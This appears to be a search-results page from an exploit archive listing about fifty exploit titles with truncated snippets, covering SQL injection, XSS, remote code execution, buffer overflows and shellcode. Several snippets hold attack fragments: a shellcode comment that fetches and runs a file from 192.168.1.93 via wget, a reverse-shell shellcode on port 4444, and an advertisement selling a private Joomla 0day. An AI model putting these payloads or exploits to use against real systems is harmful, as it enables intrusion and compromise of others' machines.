39001 matches found
WebVet 0.1a - id SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: WebVet 0.1a - 'id' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://webvet.exreality.net/ Software Link: https://netix.dl.sourceforge.net/project/webvet/webvet20130708.zip Version: 0.1a Category: Webapps Tested...
Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution Vulnerabilities
Exploit for windows platform in category remote exploits I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality. I have only been able to reproduce this on Windows, i.e. where "" is a pat...
Intel Network Adapter Diagnostic Driver - IOCTL Handling Vulnerability
Exploit for windows platform in category dos / poc / Intel Network Adapter Diagnostic Driver IOCTL Handling Vulnerability Vendor: Intel Product webpage: http://www.intel.com Affected products: Network Adapter Driver for Windows XP Network Adapter Driver for Windows 7 Network Adapter Driver for...
Kayako eSupport v3.70.02 SQL injection Vulnerability
Exploit for php platform in category web applications ==================================================== Kayako eSupport v3.70.02 SQL injection Vulnerability ==================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' ...
WordPress adivaha Travel Plugin 2.3 - Reflected XSS Vulnerability
Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS Exploit Author: CraCkEr Vendor: adivaha - Travel Tech Company Vendor Homepage: https://www.adivaha.com/ Software Link: https://wordpress.org/plugins/adiaha-hotel/ Demo: https://www.adivaha.com/demo/adivaha-online/ Version: 2.3...
Prestashop 8.0.4 - CSV injection Vulnerability
Exploit Title: Prestashop 8.0.4 - CSV injection Application: prestashop Version: 8.0.4 Bugs: CSV Injection Technology: PHP Vendor URL: https://prestashop.com/ Software Link: https://prestashop.com/prestashop-edition-basic/ Date of found: 14.05.2023 Author: Mirabbas Ağalarov Tested on: Windows 2...
Online Diagnostic Lab Management System v1.0 - Remote Code Execution Exploit
Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution RCE Unauthenticated Exploit Author: yousef alraddadi - https://twitter.com/y0usef11 Vendor Homepage:...
QEMU Monitor HMP migrate Command Execution Exploit
This Metasploit module uses QEMU's Monitor Human Monitor Interface HMP TCP server to execute system commands using the migrate command. This module has been tested successfully on QEMU version 6.2.0 on Ubuntu 20.04. This module requires Metasploit: https://metasploit.com/download Current source:...
ECOA Building Automation System Authorization Bypass / Insecure Direct Object Reference
ECOA building automation systems suffer from authorization bypass and insecure direct object reference vulnerabilities. Many versions are affected. ECOA Building Automation System Authorization Bypass / IDOR Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version...
ApacheOfBiz 17.12.01 - Remote Command Execution via Unsafe Deserialization of XMLRPC arguments
Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution RCE via Unsafe Deserialization of XMLRPC arguments Exploit Author: Álvaro Muñoz, Adrián Díaz s4dbrd Vendor Homepage: https://ofbiz.apache.org/index.html Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip...
CloverDX 5.9.0 - Cross-Site Request Forgery to Remote Code Execution Exploit
Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery CSRF to Remote Code Execution RCE Exploit Author: niebardzo Vendor Homepage: https://www.cloverdx.com/ Software Link: https://github.com/cloverdx/cloverdx-server-docker Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x Tested on:...
ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service Exploit
Exploit Title: ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service PoC Exploit Author: MegaMagnus Vendor Homepage: https://www.acti.com/ Software Link: https://www.acti.com/DownloadCenter Version: V.3.0.12.42 , V.2.3.04.07 Tested on: Windows 7, Windows 10 CVE: CVE-2020-15956...
Pandora FMS 7.0 NG 746 Script Insertion / Code Execution Vulnerability
Pandora FMS 7.0 NG versions 746 and below remote code execution exploit that leverages cross site scripting. Requires administrator to perform an snmp scan with a cross site scripting payload. Exploit Title: PandoraFMS 7.0 NG ≤ 746 Remote Code Execution Date: July 2020 Author: AppleBois Version:...
Linux/ARM - execve /bin/dash Shellcode (32 bytes)
Title: Linux/ARM - execve /bin/dash Shellcode 32 bytes Category: Shellcode Tested: armv7l 32-bitRaspberry Pi 2 Model B OS: Raspbian Buster Lite Author: Anurag Srivastava Description: execve shellcode / Objdump pi@raspberrypi:/hex $ objdump -d ed1 ed1: file format elf32-littlearm Disassembly of...
AnyBurn 4.8 - Buffer Overflow (SEH) Exploit
Exploit Title: AnyBurn 4.8 - Buffer Overflow SEH Vendor Homepage: http://www.anyburn.com/ Software Link : http://www.anyburn.com/anyburnsetup.exe Exploit Authors: "Richard Davy/Gary Nield" Tested Version: 4.8 32-bit Tested on: Windows 10 Enterprise x64 Vulnerability Type: Buffer...
Xinet Elegant 6 Asset Library Web Interface 6.1.655 SQL Injection Vulnerability
NAPC Xinet interface Elegant 6 Asset Library version 6.1.655 allows pre-authentication error-based SQL injection via the /elegant6/login LoginFormusername field when double quotes are used. + Credits: hyp3rlinx + Website: hyp3rlinx.altervista.org + Source:...
Linux/ARM64 - mmap() + read() stager + execve("/bin/sh", NULL, NULL) Shellcode (60 Bytes
/ Title: Linux/ARM64 - mmap + read stager + execve"/bin/sh", NULL, NULL Shellcode 60 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description:...
Linux/x86 - Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes)
Linux/x86 - Chmod + Execute /usr/bin/wget http://192.168.1.93//x + Hide Output Shellcode 129 bytes / ; Shellcode 129 Bytes ; download via wget + chmod + execute shellcode + hide output ; Exec: /usr/bin/wget http://192.168.1.93//x /dev/null 2&1 ; global start section .text start: ;fork xor eax,eax...
ASUS DSL-N12E C1 1.1.2.3_345 - Remote Command Execution Exploit
Exploit for hardware platform in category web applications Exploit Title: ASUS DSL-N12EC1 1.1.2.3345 - Remote Command Execution Date: 2018-08-02 Exploit Author: Fakhri Zulkifli @d0lph1n98 Vendor Homepage: https://www.asus.com/ Software Link: https://www.asus.com/Networking/DSLN12EC1/HelpDeskBIOS/...
Interspire Email Marketer - Remote Admin Authentication Bypass Exploit
The function in charge of checking whether the user is already logged in init.php in Interspire Email Marketer IEM prior to 6.1.6 allows remote attackers to bypass authentication and obtain administrative access by using the IEMCookieLogin cookie with a specially crafted value. On top of that, if...
Microsoft Windows Kernel - NtQueryVirtualMemory(MemoryMappedFilenameInformation) 64-bit Pool Memory
Exploit for windows platform in category dos / poc / We have discovered that the nt!NtQueryVirtualMemory system call invoked with the 2 information class MemoryMappedFilenameInformation discloses portions of uninitialized kernel pool memory to user-mode clients. The vulnerability affects 64-bit...
Joomla! 3.3.0 SQL Injection / automatic upload shell Exploit (0day)
Joomla Core version 3.3.0 have suffers from a remote SQL injection vulnerability and upload shell. This is private exploit. You can buy it at https://0day.today...
WordPress SuperBackup 2.3.3 Shell Upload Vulnerability
CVE-2024-56064 WP SuperBackup = 2.3.3 - Unauthenticated Arbitrary File Upload Description The Super Backup & Clone - Migrate for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 2.3.3. This makes it...
Ivanti EPM RecordGoodApp SQL Injection / Remote Code Execution Exploit
Ivanti Endpoint Manager EPM 2022 SU5 and prior versions are susceptible to an unauthenticated SQL injection vulnerability which can be leveraged to achieve unauthenticated remote code execution. This module requires Metasploit: https://metasploit.com/download Current source:...
Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure Exploit
Exploit Title: Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure Exploit Author: Rizal Muhammed @ub3rsick Vendor Homepage: https://www.wipro.com/holmes/ Version: Wipro Holmes Orchestrator v20.4.1 Tested on: Windows CVE : CVE-2021-38283 import requests as rq import argparse import datetime...
Perch v3.2 - Stored XSS Vulnerability
Exploit Title: Perch v3.2 - Stored XSS Application: Perch Cms Version: v3.2 Bugs: XSS Technology: PHP Vendor URL: https://grabaperch.com/ Software Link: https://grabaperch.com/download Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ========================================...
Boom CMS v8.0.7 - Cross Site Scripting Vulnerability
Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting Product & Service Introduction: =============================== Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life easy for content editors and website...
Microsoft Windows 11 - (cmd.exe) Denial of Service Exploit
Exploit Title: Microsoft Windows 11 - 'cmd.exe' Denial of Service Exploit Author: Milad Karimi Ex3ptionaL Date: 2023-03-30 Vendor Homepage: https://www.microsoft.com/en-us Software Link: https://www.microsoft.com/en-us Tested Version: N/A Tested on OS: Windows 11 Pro About App Microsoft Windows i...
perfSONAR v4.4.5 - Partial Blind CSRF Vulnerability
Exploit Title: perfSONAR v4.4.5 - Partial Blind CSRF Link: https://github.com/perfsonar/ Affected Versions: v4.x = v4.4.5 Vulnerability Type: Partial Blind CSRF Discovered by: Ryan Moore CVE: CVE-2022-41413 Summary A partial blind CSRF vulnerability exists in perfSONAR v4.x = v4.4.5 within the...
Pet Shop Management System 1.0 - Remote Code Execution (Unauthenticated) Exploit
Title: Pet Shop Management System 1.0 - Remote Code Execution RCE Unauthenticated Author: Mr.Gedik Vendor Homepage: https://www.sourcecodester.com Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html Version: 1.0...
Dolibarr ERP / CRM 14.0.1 - Privilege Escalation Vulnerability
Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation Exploit Author: Vishwaraj101 Vendor Homepage: https://www.dolibarr.org/ Affected Version: = 14.0.1 Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d Summary: Using the below chain of issues...
Doctor Appointment System 1.0 SQL Injection Vulnerability
Exploit Title: Doctor Appointment System 1.0 Blind SQL injection in comment parameter CVE: CVE-2021-27315 Exploit Author: Soham Bakore Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html Software Link:...
BarcodeOCR 19.3.6 - (BarcodeOCR) Unquoted Service Path Vulnerability
Exploit Title: BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path Exploit Author: Daniel Bertoni Vendor Homepage: https://www.barcode-ocr.com/ Version: 19.3.6 Tested on: Windows Server 2016, Windows 10 Find the Unquoted Service Path Vulnerability: C:\wmic service get...
Daily Expenses Management System 1.0 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Daily Expenses Management System 1.0 - Multiple Persistent Cross-Site Scripting Exploit Author: Edo Maland Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html Software Link:...
Alps Pointing-device Controller 8.1202.1711.04 - (ApHidMonitorService) Unquoted Service Path
Exploit Title: Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path Date: 2019-11-12 Exploit Author: Mario Rodriguez Vendor Homepage: https://www.alps.com/e/ Software Link: https://www.alps.com/e/ Version: 8.1202.1711.04 Tested on: Windows 10 Home x64 Spani...
ASX to MP3 converter 3.1.3.7 - (.asx) Local Stack Overflow (DEP) Exploit
Exploit Title: ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow DEP Exploit Author: max7253 Vendor Homepage: http://www.mini-stream.net/ Software Link: https://www.exploit-db.com/apps/f4da5b43ca4b035aae55dfa68daa67c9-ASXtoMP3Converter.exe Version: 3.1.3.7.2010.11.05 Tested on: Microsoft...
Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode (70 bytes)
/ Title: Linux/x8664 - Reverse0.0.0.0:4444/TCPShell/bin/sh- Null Free Shellcode ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 70 bytes ;github = https://github.com/STARRBOY compilation and execution of assembly code ------------------------------------- nasm -felf64...
PHPads 2.0 - (click.php3?bannerID) SQL Injection Vulnerability
Exploit for php platform in category web applications + Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores + Risk: High + CWE Number : CWE-89 + Author: Felipe Andrian Peixoto + Vendor Homepage: https://blondish.net/ + Software Demo :...
RemoteMouse 3.008 - Arbitrary Remote Command Execution Exploit
""" Exploit Title: Remote Mouse 3.008 Failure to Authenticate Date: 4/9/2019 Exploit Author: 0rphon Software Link: https://www.remotemouse.net/ Version: 3.008 Tested on: Windows 10 Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it This script po...
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution Vulnerability
Exploit for php platform in category web applications Drupal FALSE; instead of the standard unserialize$values'options';. As for all FieldItemBase subclasses, LinkItem references a property type. Shortcut uses this property type, for a property named link. Triggering the unserialize Having all...
Raisecom Technology GPON-ONU HT803G-07 Command Injection (1)
Raisecom Technology GPON-ONU HT803G-07 suffers from an authenticated command injection vulnerability in the fmgponloid parameter. Raisecom Technology GPON-ONU HT803G-07 Command Injection 1 ===================================== Authenticated Shell Command Injection...
MySQL 5.6.35 / 5.7.17 Integer Overflow Exploit
MySQL versions 5.6.35 and below and 5.7.17 and below suffer from an integer overflow vulnerability. ''' Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599poc.py Exploit Title: Remote MySQL DOS Integer Overflow Google Dork: N/A Date: 13th April 2017 Exploit Autho...
Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability
Exploit for unknown platform in category web applications ============================================================= Mlffat 2.1 Auth Bypass / Cookie SQL Injection Vulnerability ============================================================= MLFFAT 2.1 - insecure Cookie Handling Buy:...
BackLinkSpider (cat_id) Remote SQL Injection Vulnerability
Exploit for unknown platform in category web applications ========================================================== BackLinkSpider catid Remote SQL Injection Vulnerability ========================================================== \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / /...
changedetection 0.45.20 Remote Code Execution Exploit
Exploit Title: changedetection = 0.45.20 Remote Code Execution RCE Exploit Author: Zach Crosman zcrosman Vendor Homepage: changedetection.io Software Link: https://github.com/dgtlmoon/changedetection.io Version: = 0.45.20 Tested on: Linux CVE : CVE-2024-32651 from pwn import import requests from...
Kibana Prototype Pollution / Remote Code Execution Exploit
Kibana versions prior to 7.6.3 suffer from a prototype pollution bug within the Upgrade Assistant. By setting a new constructor.prototype.sourceURL value you can execute arbitrary code. Code execution is possible through two different ways. Either by sending data directly to Elastic, or using...
Academy LMS 6.1 Cross Site Scripting / File Upload Vulnerabilities
Exploit Title: Academy LMS 6.1 - Arbitrary File Upload Exploit Author: CraCkEr Vendor: Creativeitem Vendor Homepage: https://academylms.net/ Software Link: https://demo.academylms.net/ Tested on: Windows 10 Pro Impact: Allows User to upload files to the web server CWE: CWE-79 - CWE-74 - CWE-707...
Global Multi School Management System Express v1.0 - SQL Injection Vulnerability
Exploit Title: Global - Multi School Management System Express v1.0- SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378 Tested on: Kali Linux & MacOS CVE: N/A Request POST /report/balance HTTP/1.1 Content-Type...
Blackcat Cms v1.4 - Remote Code Execution Vulnerability
Exploit Title: Blackcat Cms v1.4 - Remote Code Execution RCE Application: blackcat Cms Version: v1.4 Bugs: RCE Technology: PHP Vendor URL: https://blackcat-cms.org/ Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS Date of found: 13.07.2023 Author: Mirabbas Ağalarov Tested on: Lin...
ChurchCRM 4.5.1 - Authenticated SQL Injection Exploit
Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection Exploit Author: Arvandy Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md Software Link: https://github.com/ChurchCRM/CRM/releases Vendor Homepage: http://churchcrm.io/ Version: 4.5.1 Tested on: Window...